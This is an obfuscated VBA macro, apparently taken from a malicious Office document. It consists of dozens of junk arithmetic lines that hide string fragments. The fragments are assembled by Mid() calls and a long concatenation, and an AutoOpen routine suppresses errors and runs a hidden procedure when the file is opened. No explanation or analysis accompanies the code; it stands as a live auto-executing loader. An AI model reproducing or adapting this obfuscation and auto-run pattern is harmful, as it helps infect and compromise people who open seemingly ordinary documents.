XzvPSPpKJwh = (zDLjijoa - Rnd(43 * Tan(ATiDuWi)) / kVtIsUkMrZzF * Oct(IPnWIkzjoKWYn) * jciuZOYjsmBEjb / Oct(mJoUOsEvjl - Chr(250) + 581 - ChrB(lCwKXjFVAkMf)) - 389 + rPZXAVDBVNC)
fnaBKzGnH = (iovwLTNj) + Mid("FqWkqNYpsBajBwfjbjidPwuLE sktlfAWRjiLB", 18, 3)
jLJMrHZNJEX = (wUPRmXEFcXR - Rnd(43 * Tan(vkBNuRMRlqp)) / RQqMUGGbiwGsQ * Oct(mBhNUhRiLrM) * lazrrFfYzVjrk / Oct(RqwzdJzUfL - Chr(250) + 581 - ChrB(YWIZjFwAdVfd)) - 389 + HANraQUpcwPa)
htSMNcu = (arrVZDaoRpPwjM - Rnd(43 * Tan(oEzEiSzZN)) / EqWpoQsibpsj * Oct(amTqlGCUXBaFWr) * RhbSikVMEzdZWR / Oct(XXEFXRLb - Chr(250) + 581 - ChrB(TLQjpvkRZ)) - 389 + NtNaFOEZPrHhf)
TARaKjVzMo = (QirHBmNLq - Rnd(43 * Tan(vFtOruvYtwz)) / kziDjrfoRrsKz * Oct(zUzdNYXkHoYj) * MXKdAQYztZzCVj / Oct(LENjPFw - Chr(250) + 581 - ChrB(bQkbUzpufDw)) - 389 + RHNrtaoDv)
ILhSn = (NODuRvmHSiWz) + Mid("ofShRCkSLiADqSMkLsTGEc rauhZi", 23, 1)
pKGNZGkvFVI = (PiDAQUi - Rnd(43 * Tan(FNwSUoX)) / PLzdEOJz * Oct(rSrvkFlfNRLskB) * LHnAbmt / Oct(CHbwhCwBU - Chr(250) + 581 - ChrB(AZCqKVH)) - 389 + nGXMPiKuS)
UBIhJvvzf = (PWdhKUWFJW - Rnd(43 * Tan(XThKRCETOWQU)) / oATEJjQXdCC * Oct(YrqFUMVvGD) * BfLUzEmDwBAt / Oct(BSvcFMtR - Chr(250) + 581 - ChrB(otKONtJvYXl)) - 389 + RZwMTTrzE)
QaZjj = (mjbCVzSsOzmtq - Rnd(43 * Tan(wlmkCaLkocABV)) / wIKrHVcv * Oct(szwHQGNKIwwL) * RsNpiCuzCT / Oct(FtFovmUOBCu - Chr(250) + 581 - ChrB(DSuibRsCZAarS)) - 389 + RqaAjpdWCXA)
OZBnsiuj = (aJVMzBpoIJEcPQ) + Mid("wrcRDiACNmrFSiEQaBiuuBT", 14, 1)
ziKJpWH = (YwfECQspuJ - Rnd(43 * Tan(WqSJiqstC)) / cIrkszQmtBS * Oct(UUMjJrsDjcb) * uifClcz / Oct(CrvqnTJ - Chr(250) + 581 - ChrB(cDBHzwWzz)) - 389 + hBAztAjpqKRNBQ)
mWLIjZtlG = (hwRSfYdhSacr - Rnd(43 * Tan(IOibhFGqcPpYFQ)) / aXscRzoBw * Oct(UtcFvZBKR) * wYEDwGtFhcua / Oct(MGvhAZwT - Chr(250) + 581 - ChrB(mINLdljpn)) - 389 + ofRCSofLG)
OqXUF = (ZafbUEzLiFlu - Rnd(43 * Tan(FCzvJwdzBOCkEl)) / tYaDrTaYNY * Oct(kswjIPVE) * VfiMwMiY / Oct(dqPTaSKi - Chr(250) + 581 - ChrB(CiiijWzOlASG)) - 389 + OAiBNtNHflCM)
sinOBtkpwGB = (MYdZWvp) + Mid("BtPMSFIujPjAjwlXnsHNjJqKnhS   oY", 28, 3)
GZumiDrn = (UUYtmPwArAkV - Rnd(43 * Tan(lmvqlcHZr)) / jmcuEdtVOpltR * Oct(TZNmjwmdTNjQ) * wujwIdfsHJ / Oct(uXwfVfjrUL - Chr(250) + 581 - ChrB(LOVtsBCTPO)) - 389 + GubiqcQmrLQsr)
NLDLXzmYLw = (OLFWXLr - Rnd(43 * Tan(XkSpXaOPHnus)) / cDVlQfGVP * Oct(GwMaNiWU) * wuJXtnhdqvEu / Oct(holHkkGflOIaLr - Chr(250) + 581 - ChrB(ABllSJtX)) - 389 + jbziCQaKP)
NzNfDotTH = (iUdPkdqotGG - Rnd(43 * Tan(DEroEbhUL)) / VdksuufjZrvTsK * Oct(MjJBXWmks) * DQwbNOqPnwAfrj / Oct(IKhOVkLjbrvYSo - Chr(250) + 581 - ChrB(jsrwqdjHMd)) - 389 + EELMhoa)
pqcwwzi = (zHHnjovK) + Mid("kUehikXqfplAinEmhTJlb", 3, 3)
tuwUZJwInBN = (QYoFtlNF - Rnd(43 * Tan(fBwiwXdpJ)) / bknQTbInY * Oct(UnzKzalLvrA) * EjrRjtA / Oct(YbQqnbdI - Chr(250) + 581 - ChrB(ilwpbssDmj)) - 389 + lStSTXjHYC)
RwQir = (nvNJiwOGwa - Rnd(43 * Tan(XzfuYOHBTTE)) / cwmairoVmufA * Oct(CWQJDYKLfkqV) * GdICXFiIl / Oct(vWfOHEoc - Chr(250) + 581 - ChrB(iLVrrsPvua)) - 389 + NwERkKNkXaRaRL)
GwQKCKdSEz = (BOcnzNw - Rnd(43 * Tan(iaGiwXQu)) / jTmVLdXzUw * Oct(LYHcbLRIE) * ZouFHmwLZj / Oct(cctWflq - Chr(250) + 581 - ChrB(EoiQjwFSiGmG)) - 389 + pBKirPDr)
jvcjXKhtv = (PmMEtXGWXzdpR) + Mid("rVjUszGtLqWatjAiinpIWBz   NBhSqRjNnsLqLZ", 24, 3)
YORiCX = (nYJCGrIWrF - Rnd(43 * Tan(mQJHJohowwRN)) / zrEFtMkDfWF * Oct(lrUFFaNMzYwaP) * dsdNVWKjF / Oct(nDdiUhGtE - Chr(250) + 581 - ChrB(YwNisYDBd)) - 389 + udpcjsZSBj)
oLjSw = (ERivBfpU - Rnd(43 * Tan(HKTzXaqTFnwtzz)) / OWiTGnjC * Oct(PClBksXmNG) * wLubuszUa / Oct(PFTVjfBVNKX - Chr(250) + 581 - ChrB(uhUpojNP)) - 389 + fsfKDbCZ)
XzobiljUG = (shivUzSICjUKNB - Rnd(43 * Tan(cInsUiSJIQrbTJ)) / GsGqjCNi * Oct(DQZDFkIovoPJiJ) * QaXVfdV / Oct(zpabDXRtOdppEJ - Chr(250) + 581 - ChrB(DYHCfftCb)) - 389 + EZJiszViRZNf)
uvwNiUs = (FmESBwjrRSCW) + Mid("MotITRGC^ojQMJqtENbMVNulMiWYHiFGz", 8, 3)
wjMnUECEHL = (pOcsAzRjD - Rnd(43 * Tan(VQzwupQNG)) / DNHKTjN * Oct(KdDwwzUIjCjXY) * jztwfvlV / Oct(OvTLbHRYRjdVZ - Chr(250) + 581 - ChrB(XUAblINj)) - 389 + hvhHQXERCpqo)
SOvrSo = (CEwrLHKnK - Rnd(43 * Tan(pYpRjSEYOww)) / EHXicCj * Oct(jCrhEOmQtfLj) * qYGMXCQchzbWz / Oct(pUciIHYrmhHNRf - Chr(250) + 581 - ChrB(iinMJNiQWFzPJ)) - 389 + DPLFPzw)
PuzYz = (umGqWciUzMZiM - Rnd(43 * Tan(PuABANSajjUU)) / NiktjQvmIbRtv * Oct(wDcRGppYzB) * dCUTGXVB / Oct(RlPSpRRAGSiI - Chr(250) + 581 - ChrB(nVXDSOi)) - 389 + ojjhFOa)
zNizSZ = (cntBOiP) + Mid("maowIdIfzWhuicmCiIc% dXrQjatY", 19, 3)
KIwnXz = (ACcUzmYEK - Rnd(43 * Tan(loCQnJplGDGZ)) / sPojRwHC * Oct(rNhkkpOwrRvO) * UzmbBPdqsLb / Oct(jFKDHICjDwpiCZ - Chr(250) + 581 - ChrB(XKLoiuO)) - 389 + owpusYrzCGqAkD)
JjMjMatPrAK = (cNzPHqK - Rnd(43 * Tan(BkwFJrJt)) / zwhFNFQTXQwF * Oct(GnmBRLzqJNEScL) * imNnrFaXR / Oct(OHjwkZNEHdKTIZ - Chr(250) + 581 - ChrB(wuojdmkuCkkDIN)) - 389 + jQVHCDQtYnqOV)
bqZIjKiiYCN = (WzAVKVGROKKM - Rnd(43 * Tan(ncMYPTRaflOnWi)) / QScSKSfIqfZim * Oct(uiUObXbMDz) * PFqMliorOAwis / Oct(dHTVtql - Chr(250) + 581 - ChrB(HlCuYuGQDOc)) - 389 + vNowFzlqXTw)
FVffNoc = (kIsfaYKDZcPGj) + Mid("VnzsdzbGBkiOJOEEwJdUvwNRtrpioFRZ", 2, 1)
mzhutPd = (EPiopvLmnnIi - Rnd(43 * Tan(iMzWFrSwt)) / BWujAPvmYPMzUG * Oct(SSduchwYq) * hZQkXClKRdRu / Oct(KWrAkOAhr - Chr(250) + 581 - ChrB(ImYpCQQCzEuTp)) - 389 + BAManDdwYDS)
HcJLYSPWFw = (jlwEhJPEO - Rnd(43 * Tan(ruPGMjz)) / wjhOcHtuVww * Oct(cijXYRJbRWNm) * QhOYYaiw / Oct(KijUJqLnoRF - Chr(250) + 581 - ChrB(aMOsivWXMZW)) - 389 + CLaiWwYQnBUBnD)
qOzQwnvcEEE = (NjtAbTqTrhMzjC - Rnd(43 * Tan(uoPLOVWifk)) / oOqiIXDCzrtDC * Oct(hjbqYhfHPKB) * wkdqENQnf / Oct(dMYpvhCiAlN - Chr(250) + 581 - ChrB(hlvoHDHjwjdq)) - 389 + TZJnfmOzEGO)
snIlv = (kjOJpEphIw) + Mid("UtrflRhJQpAtplPwcPpcmYpijHMRKtDDf", 20, 2)
mqqVGdtUw = (SQdivjjq - Rnd(43 * Tan(AjqiLaOkIo)) / zQjQrtppZ * Oct(MEinDHiqbOSVF) * qGtEMmktzlK / Oct(jMrCruQ - Chr(250) + 581 - ChrB(nbLrHTfthZA)) - 389 + KCalzkcmHSF)
MoNwiic = (LwkjTBJAh - Rnd(43 * Tan(VJiSvVc)) / FETQstW * Oct(TklOjiHAsXwPlN) * IoziRWSrBUb / Oct(NvvDqMWiYPSU - Chr(250) + 581 - ChrB(BdZXXMPsZKbvL)) - 389 + aAtkuEu)
JqTPZP = (tGqMZkirjmGCHS - Rnd(43 * Tan(VVVRPGvKtIC)) / XiLLqwmifQG * Oct(ItJrjtWPFaG) * tcmqwwzEXI / Oct(IVaPEUjw - Chr(250) + 581 - ChrB(PoJWzEa)) - 389 + lmXwcqS)
utUZB = (cBYVzYXXEcqOuB) + Mid("MGfzUK PHjATKuk", 7, 1)
VrIZvzn = (FzTHCOfHtVcrPt - Rnd(43 * Tan(TdHMsokTIfHwi)) / fYPwHXcDPKA * Oct(SQGSUpjG) * GmsBFVdLcu / Oct(zbOzNuHWQ - Chr(250) + 581 - ChrB(OzMfWTNpK)) - 389 + PbGYlXvCB)
rlFzHSdmM = (OVipuiIwE - Rnd(43 * Tan(SAsVphLODjrj)) / TXmiYLr * Oct(IHTGNTPwQN) * AWAIOtWiF / Oct(mjahPPSIzkl - Chr(250) + 581 - ChrB(KJtYOcOv)) - 389 + mVcjjSOXo)
TojImLHHVq = (pjWiCQWRcCVVp - Rnd(43 * Tan(pzFURYbh)) / QjREjkjFkzh * Oct(rYTziVWnftVMzQ) * dqYkQHBGClM / Oct(jszkYIOwalVj - Chr(250) + 581 - ChrB(FtwWLEG)) - 389 + JGOMMQppS)
zPBdoEJQl = (snQhPqCJFaiKqI) + Mid("lVpTqLFwtLIPGkCrEIiYfXnqJAwjQ", 8, 1)
GNEbmLV = (jmwWYtY - Rnd(43 * Tan(EzpQdcnMrPqfuQ)) / LzNzBfwD * Oct(LiFaMmVipiJw) * VrAsXbzhIG / Oct(cmWKwXSIt - Chr(250) + 581 - ChrB(FvWNAEt)) - 389 + pQGLmiWw)
VjqnNcuS = (zAzWOoQapowdT - Rnd(43 * Tan(sJBQdaWwttwdv)) / LwYkMThdQ * Oct(XkXRifjW) * JYCuFXQVB / Oct(DaltzOtP - Chr(250) + 581 - ChrB(QAJPtrttC)) - 389 + TOKaLms)
DUIPpkUjFV = (QLhRMBEUQw - Rnd(43 * Tan(fXWFVTqIRzs)) / zPJnpBDTjQaoi * Oct(YEFGSNaTdlw) * hjlhfZXXiCCOOS / Oct(cwOwhXrum - Chr(250) + 581 - ChrB(LhiNjmY)) - 389 + sUTizlBRLvVBq)
wmXnozQIfGd = (IVDDCbpz) + Mid("UCRsizYr&  kHNYHsUiCfnCp", 9, 3)
wBJrXs = (BTNwwjWM - Rnd(43 * Tan(lqYClPVFRzIJ)) / MdOQitt * Oct(ZGGErwBUCdtjIH) * iBhwoVu / Oct(jAzGjihwcTkMk - Chr(250) + 581 - ChrB(wuTUlPVPc)) - 389 + FbkOAvEdiTWErp)
ijolatsvc = (EBbNQIOa - Rnd(43 * Tan(XCwLMswSTEfn)) / vULaZrSFsfu * Oct(VHJDNETnJrOtj) * BLzwzRTiFHCqjW / Oct(biWCSrkn - Chr(250) + 581 - ChrB(FALzQEFRu)) - 389 + qGIvfcZrCCB)
jKAPPH = (nfUkfRU - Rnd(43 * Tan(FBHwTzhOGh)) / uuCdCzuqw * Oct(WKIXKMPjt) * CCflnKnBhjwRNC / Oct(JlBSllbVI - Chr(250) + 581 - ChrB(rzaIlRiMiOrO)) - 389 + qrLtIPQEz)
vWBatwO = (lUfQNXuSM) + Mid("rjtK  SzihotRbtnoTPiHSoItXaRMiLNlojzifU", 5, 2)
WIwADuSTSB = (VzjiMrrNHQ - Rnd(43 * Tan(iqzGTNBBkv)) / jATirZtz * Oct(kNhiOTisNajT) * iZEfWFiAAQ / Oct(NQfOdzRUHio - Chr(250) + 581 - ChrB(IUrAiJnKPo)) - 389 + StdMCnVh)
mdddFFOkI = (lkzslSzoCjHj - Rnd(43 * Tan(wkzjFdRo)) / ksXGWdrEImSwwY * Oct(MBtiKGsv) * ZNEwGkBbupAEV / Oct(wTwzXUOKzLk - Chr(250) + 581 - ChrB(Dkiiqrwjj)) - 389 + ZvwYlqEH)
APIciouKl = (EwKfFArNGMYKNV - Rnd(43 * Tan(nOjmAEYCCtNKuZ)) / DcOYphB * Oct(iUpWqttnaw) * atiZrqftH / Oct(spznEIwvojRl - Chr(250) + 581 - ChrB(wRKhiJJFnLfwI)) - 389 + DXiJoumpfs)
BKcKhtq = (wFRznTOOILLr) + Mid("fYfXKuIv  tzWRElIwNukcQzIRPCStm", 9, 2)
WlkFG = (IrWzPNIVbc - Rnd(43 * Tan(NtLmjQsPz)) / HownuBww * Oct(XGsmcbjnTQhW) * ERvjkMrVwo / Oct(QADYKUMK - Chr(250) + 581 - ChrB(sEJUGjKzdY)) - 389 + SlmkhrOQmHNZRk)
hVrfwKzF = (WVPiAjz - Rnd(43 * Tan(HYwHZcKlpnAztw)) / ZBQHwutPJcRJ * Oct(kdijrznHb) * IKmOVdIZGXmp / Oct(kYACNIpiISs - Chr(250) + 581 - ChrB(MIQIvKb)) - 389 + SHzLfYmADKlfvz)
zOhsinaFAk = (bZBBrrZp - Rnd(43 * Tan(fOSrSGvYPifrk)) / HmrAauvlJlYQ * Oct(PkPWzbuqMGRKr) * wlwTQqot / Oct(ArzuuuFhS - Chr(250) + 581 - ChrB(SjnzIfQ)) - 389 + uvjaqimwzLRIZ)
zKmsuMj = (bYIdwDWAcz) + Mid("tOfzqipnElWKITfR hzH", 17, 1)
jEdoiHlAs = (KqvawlDAsuOJUr - Rnd(43 * Tan(KNLqKcbpW)) / WobzjMEMOGRAk * Oct(MPGERRORJlz) * UFoSiBYlbz / Oct(CLhJzGlzKdi - Chr(250) + 581 - ChrB(vVWXFaFfqzI)) - 389 + zXwXQbwAPmEtk)
CijYlHj = (nmDmTCwLLupIFf - Rnd(43 * Tan(zvcMtwTifN)) / utfaCpYBmEz * Oct(oQphpXFpwXX) * QRJjzUD / Oct(YnIFjlsAjE - Chr(250) + 581 - ChrB(VzPnwDRdLaXkX)) - 389 + cJkjoDSAcG)
rAiJi = (wLiTKWSlFDpKa - Rnd(43 * Tan(NjjiiOIR)) / nwJvHEINGYi * Oct(LmIniwAzpuzqAK) * GQDMkii / Oct(UBaKhwqilwKBw - Chr(250) + 581 - ChrB(qDRHSosBSvz)) - 389 + CwDLuVd)
zjSuiqJ = (RKXlpulb) + Mid("wFMsHNuipfONXzi  iEpI", 16, 2)
XhhVONPcsHr = (HkAEfFF - Rnd(43 * Tan(iCDAiNjjqszBD)) / iEbITvAZUXJm * Oct(TQZjVSssUYIGT) * XbIiFwWB / Oct(cWlKrEifrrYMQR - Chr(250) + 581 - ChrB(cjKtOfTC)) - 389 + ncwLtDo)
CEfjzwjPQu = (YiRsLzUjnXR - Rnd(43 * Tan(XjJUEtOIK)) / HYiOJhQDFz * Oct(wjBNnjVmPSfwwY) * DZmdJEW / Oct(WsJznnP - Chr(250) + 581 - ChrB(RRVYwIGRNsVu)) - 389 + bZjqJdr)
iAimM = (ROuvHKwCWncnR - Rnd(43 * Tan(UkXOGWmn)) / FvzUCsb * Oct(FcmBoFrV) * OqhApiBnpwkmh / Oct(GdKozJquK - Chr(250) + 581 - ChrB(dXKiHfifsSHwFD)) - 389 + RvjMtrXXM)
EGAVzr = (RTzJjHAnm) + Mid("YZJECHzwdpLQNjMWUwiAsUaLskvK", 8, 3)
XjqvBditNQq = (cqtciiVdj - Rnd(43 * Tan(wAiNjczDvTUQ)) / jbvvSaHiJ * Oct(SpbcwOdlni) * WuWOtGqF / Oct(YzMaJAnjCDbD - Chr(250) + 581 - ChrB(bQYFADpRhjmFM)) - 389 + YjZTRYbAVdAS)
iAYqR = (KFSZTDJLzBL - Rnd(43 * Tan(YzzJinQojjQkwH)) / PLKjBfThRrz * Oct(rsdCEGVLPKsnd) * ZtioibMZu / Oct(mRKRFPi - Chr(250) + 581 - ChrB(lzYvFdLdc)) - 389 + PFSWGlGZDcJVcS)
jVkAoOuME = (qQaUzTOCd - Rnd(43 * Tan(KfNbvuEiINYz)) / jwiOSqlMiIKJED * Oct(UbMrFArbUrK) * iYiCsrUqWTFvLr / Oct(jWCRrrZNjA - Chr(250) + 581 - ChrB(tvsWJXIvCoAG)) - 389 + SjNJBWRfO)
TIpLZ = (btikCGhSGqnGmQ) + Mid("DJOGLwEruRCEpDAACimKIJ wBOhpWaHVw", 23, 1)
ENQQz = (dPnvDGzcbCiqdn - Rnd(43 * Tan(cEwQJph)) / LYLfMFHPW * Oct(zcOYhYp) * dqUbvcmCz / Oct(XLIJvzb - Chr(250) + 581 - ChrB(samWTnHkfL)) - 389 + EXZbuLqvjdit)
oAOFuassfDMwfD = snIlv + QFQPGZTZSt + AuwDWsjuOja + ikjtSiw + jbjFFSmXh + cpjARrdLJF + fnaBKzGnH + JvzLimWJ + TdmWIRnv + zPBdoEJQl + pqcwwzi + smoXjbzRw + RjlYa + HvZFwJa + isvsZEK + FVffNoc + vXBfsCu + RZsbAwY + OZBnsiuj + wwVcvdEQ + EGAVzr + AtwDNpzNS + DNfhDvuoF + wmXnozQIfGd + zKmsuMj + uWKBYf + uvwNiUs + rPbuNNA + AasKX + azuYl + KOtAWJNsDQV + iFnzbYRbr + zNizSZ + sinOBtkpwGB + jvcjXKhtv + KohHt + vWBatwO + TIpLZ + XidNUODzt + ftRGfjr + BKcKhtq + jMwpqtA + zSqbqRkSOn + ILhSn + pjXiFWQF + zjSuiqJ + RuSOHhz + lzcLZKFk + utUZB
KFCsLwojO = (KjOcGXjUKwbQvh - Rnd(43 * Tan(kOzFEstKhcQRvw)) / riYHMtMSFTOOT * Oct(RuKUubiqbKEQ) * hzpGlYWFwr / Oct(UDXwslpdZYPiG - Chr(250) + 581 - ChrB(AUFBCOCvXfSPNc)) - 389 + zjVCVzqDmwqUa)
qzRQiJlDQ = (udlYjsd - Rnd(43 * Tan(YMmcrujkwJR)) / CMtbFZNBj * Oct(rnjcaYj) * KKJVRIoOGXk / Oct(NbmwBikKTHfbwU - Chr(250) + 581 - ChrB(zwPUIAVzGJ)) - 389 + ulnqTqRiqPAh)
brnZGCfhZ = (noRqCczrcjoUoz - Rnd(43 * Tan(dooKNiFwOn)) / UbOwacHzzwZ * Oct(nplwnUtGDoC) * OqXLSipDDaH / Oct(cfGMMrBYEM - Chr(250) + 581 - ChrB(UcfSiVj)) - 389 + fYkijFviPI)
VZNhPVHOj = (LmiZCpCjmPLiWA - Rnd(43 * Tan(zszWHRMmPin)) / nNKKQomNtuKju * Oct(MrzznCM) * RdKrZcw / Oct(OrPAPVc - Chr(250) + 581 - ChrB(utjmiCh)) - 389 + cEFVmRukb)
hvjzYPJPs = (TRtnqPuCtTZ - Rnd(43 * Tan(PvtPUXdNzw)) / ZiavGViZXpX * Oct(ziROFsOBQ) * JjlFJum / Oct(iiWmUFQUnjPu - Chr(250) + 581 - ChrB(hshtjCI)) - 389 + VivOWYtKAM)
jnlKprNOM = (kEhlWAcoDLcsdN - Rnd(43 * Tan(zbXzjWKn)) / jHPXDpjSqK * Oct(RBJrWwFGojrJY) * pQqQfca / Oct(NFPkEkNfK - Chr(250) + 581 - ChrB(TaszRfb)) - 389 + QDzkpzrWNZpC)
End Function
Sub AutoOpen()
On Error Resume Next
nqSMRrtTZ = (ChLAvvNnNQMN - Rnd(43 * Tan(jPkvFzlObNFTwj)) / afKcoWRfRaJOJB * Oct(kDawjwhwnVo) * aTGhzORNhF / Oct(ZXRkSUwjbNwd - Chr(250) + 581 - ChrB(sBwwtiW)) - 389 + zzqLLtLz)
soviTBZRM = (crmMJcqEp - Rnd(43 * Tan(RTUzjcZXbYHbkj)) / YDzircimiGiU * Oct(pNVGEPhZUvvqc) * qnHAHCd / Oct(ZqWzTmhpsEIl - Chr(250) + 581 - ChrB(NDAXUCKEHErP)) - 389 + owWFXSKEoij)
GvusiDqiq = (dkHdmASjS - Rnd(43 * Tan(fiswjTnjqbdZ)) / QQYHSZENJY * Oct(KNPbkRrY) * rEXDvILPJr / Oct(pEMqMOsAG - Chr(250) + 581 - ChrB(ZWJkoVELw)) - 389 + kFCjMtVLJO)
oDRKTFAYP = (YqRISiOTHn - Rnd(43 * Tan(ENTdjBfd)) / shrsZWEzRi * Oct(fwaztouNii) * EWHkpwj / Oct(DUuvdrzYiwdP - Chr(250) + 581 - ChrB(YRbInTj)) - 389 + HSzoqdUkpjGShi)
AkBwIuPLR = (PAfEfcC - Rnd(43 * Tan(wnwCvGnNint)) / WwUtRrGrL * Oct(fvAzZqzQFNicV) * hzouJuQbRBfSfl / Oct(oVLTHHBCzjwP - Chr(250) + 581 - ChrB(ijmtbZLUC)) - 389 + hQZEdzSG)
KMiQrSJOm = (vrNMiCslPlr - Rnd(43 * Tan(ZSlJdCi)) / YCiamDj * Oct(pTkNnfYLw) * mWLsjhOEmL / Oct(ipGfiIsMnaa - Chr(250) + 581 - ChrB(avwAiSuua)) - 389 + IPLsfTzL)
hRXmGddhE = (fzKvLDkwnj - Rnd(43 * Tan(mrREXhrTqcZO)) / sJvnpSXzNWO * Oct(ANDHIjfRbvZ) * ijwmNOv / Oct(kjCCIwG - Chr(250) + 581 - ChrB(JmYVDdXUnM)) - 389 + suzzzjoFGVkj)
zbHqRKAzL = (JHpXECELczB - Rnd(43 * Tan(CLmjFTTqAAY)) / YtvmFJm * Oct(WQkpKZfm) * usliTYv / Oct(hFhfUbJ - Chr(250) + 581 - ChrB(mzKHRGTMoImb)) - 389 + ZfnhpGHmTEVziY)
Application.Run "vMXRcQRtiXopI", tIZpqwIrwK
EEhCoaGXa = (fjoZZtKmUH - Rnd(43 * Tan(ZuzfVCwS)) / pHihPHHGzAqCFS * Oct(FRhNati) * bQiKjWSYKEj / Oct(XAGKRmEpUQF - Chr(250) + 581 - ChrB(cvZEUisAHc)) - 389 + RkzYjibj)
wYmiEKXwn = (sLKKJhozOEbLf - Rnd(43 * Tan(vtpZTOUKsk)) / vpQUtwmE * Oct(OQwHbPkm) * XFmtNjLVw / Oct(ZViSaCOsXdU - Chr(250) + 581 - ChrB(oGTKiziw)) - 389 + iiuVfVB)
chJXwJfqf = (WEMXMIvOQjaCEN - Rnd(43 * Tan(zZvmozuhMPqUz)) / fbcijbdl * Oct(RZwGPpbZcvk) * kjDrAbXAIVowFk / Oct(zYXmJOt - Chr(250) + 581 - ChrB(NprfskqNYMK)) - 389 + rZnjAGkXwkABik)
iBFJakrGp = (JviPRHQ - Rnd(43 * Tan(uqNYkrmDdVhd)) / qAHGpIPlaDljm * Oct(EbUGoUOGoW) * QOXXGWY / Oct(MSuWJczA - Chr(250) + 581 - ChrB(TmcowTi)) - 389 + IOtIbjMkAYu)
sNThNWZEJ = (LipTNmB - Rnd(43 * Tan(RSupwwHiDljimI)) / EImAFOS * Oct(PYWzkEpNwL) * jFACRVaiSoVaS / Oct(ZkKbmwj - Chr(250) + 581 - ChrB(ufQZBWaOXmXvZw)) - 389 + GVffjzj)
uwEuKUimJ = (KkLUmsTDI - Rnd(43 * Tan(RiDWcbj)) / GHQzAKl * Oct(VGLGjlcIl) * njTcLbYuSLuhR / Oct(najCzKkAjUXN - Chr(250) + 581 - ChrB(CVfFvknowkdwp)) - 389 + FsZXnobSIFa)
KbFnzzFzi = (ZnGzwivrpC - Rnd(43 * Tan(IiiHKwj)) / QkMZikJhAw * Oct(XwGFfFSYqKja) * CUCsafpDV / Oct(SlMNbPnwuu - Chr(250) + 581 - ChrB(fGBdwCr)) - 389 + sOkJtWJiRG)
VHhBZoUSr = (JDNljNXNAPcdz - Rnd(43 * Tan(cKhcTqRjWqZ)) / XdhMJfKBPpAw * Oct(jzwhBisKDZO) * rzBYchXM / Oct(qujoGwSwPnKjzn - Chr(250) + 581 - ChrB(VzULhcTESGRjJ)) - 389 + nHcmipEPtvi)
End Sub
